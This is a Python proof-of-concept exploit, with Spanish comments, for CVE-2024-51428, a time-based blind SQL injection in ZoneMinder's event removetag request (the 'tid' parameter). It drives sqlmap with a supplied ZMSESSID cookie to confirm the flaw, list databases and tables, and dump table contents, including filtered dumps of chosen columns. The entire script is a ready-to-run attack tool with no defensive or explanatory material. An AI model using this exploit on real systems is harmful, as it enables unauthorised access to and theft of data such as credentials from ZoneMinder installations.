#!/usr/bin/env python3

import argparse
import subprocess
import sys


def banner():
    print("\n[+] CVE-2024-51428 Blind SQLi PoC (sqlmap wrapper)\n")


def run_sqlmap(cmd):

    process = subprocess.Popen(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
        bufsize=1
    )

    vulnerable = False

    for line in process.stdout:

        line_clean = line.strip()

        if not line_clean:
            continue

        # detectar vulnerabilidad
        if any(x in line_clean for x in ["Parameter:", "Type:", "Payload:"]):
            vulnerable = True
            print(line_clean)
            continue

        # mostrar encabezados importantes
        if any(x in line_clean.lower() for x in [
            "available databases",
            "database:",
            "tables",
            "table:",
            "dumping",
        ]):
            print(line_clean)
            continue

        # mostrar resultados listados por sqlmap
        if line_clean.startswith("[*]"):
            print(line_clean.replace("[*] ", ""))
            continue

        # mostrar tablas ascii
        if "|" in line_clean or "+" in line_clean:
            print(line_clean)
            continue

    process.wait()

    return vulnerable


def build_base(url, cookie):

    target = f"{url}/zm/index.php?view=request&request=event&action=removetag&tid=1"

    return [
        "sqlmap",
        "-u", target,
        "--cookie", f"ZMSESSID={cookie}",
        "-p", "tid",
        "--dbms=mysql",
        "--batch",
        "--threads=10",
        "--technique=T"
    ]


def main():

    parser = argparse.ArgumentParser()

    parser.add_argument("--url", required=True, help="URL objetivo")
    parser.add_argument("-c", required=True, help="Cookie ZMSESSID")

    parser.add_argument("-d", action="store_true", help="Enumerar bases de datos")
    parser.add_argument("-db", help="Base de datos objetivo")
    parser.add_argument("-t", help="Tabla objetivo")

    parser.add_argument("-f", help="Columna a mostrar")
    parser.add_argument("-ff", nargs=2, metavar=("COLUMN", "VALUE"),
                        help="Filtro WHERE columna=valor")

    args = parser.parse_args()

    banner()

    base_cmd = build_base(args.url, args.c)

    # comprobar vulnerabilidad
    if not args.d and not args.db and not args.t:

        print("[*] Comprobando vulnerabilidad...\n")

        cmd = base_cmd + ["-v", "1"]

        vuln = run_sqlmap(cmd)

        if vuln:
            print("\n[+] OBJETIVO VULNERABLE A BLIND SQLi\n")
        else:
            print("\n[-] No se detectó vulnerabilidad\n")

        return

    # enumerar DBs
    if args.d and not args.db:

        print("[*] Enumerando bases de datos...\n")

        cmd = base_cmd + ["--dbs"]

        run_sqlmap(cmd)

        return

    # enumerar tablas
    if args.d and args.db and not args.t:

        print(f"[*] Enumerando tablas de {args.db}\n")

        cmd = base_cmd + ["-D", args.db, "--tables"]

        run_sqlmap(cmd)

        return

    # dump tabla
    if args.t:

        cmd = base_cmd + ["-D", args.db, "-T", args.t]

        # filtro WHERE
        if args.ff:

            column = args.ff[0]
            value = args.ff[1]

            if args.f:
                cmd += [
                    "-C", args.f,
                    "--where", f"{column}='{value}'",
                    "--dump"
                ]
            else:
                cmd += [
                    "-C", column,
                    "--where", f"{column}='{value}'",
                    "--dump"
                ]

        # solo columna
        elif args.f:

            cmd += ["-C", args.f, "--dump"]

        # dump completo
        else:

            cmd += ["--dump"]

        print(f"[*] Dumpeando tabla {args.t}\n")

        run_sqlmap(cmd)


if __name__ == "__main__":
    main()